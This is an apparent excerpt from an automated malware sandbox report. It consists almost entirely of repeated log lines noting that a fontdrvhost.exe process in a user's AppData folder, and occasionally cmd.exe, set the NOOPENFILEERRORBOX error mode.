                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
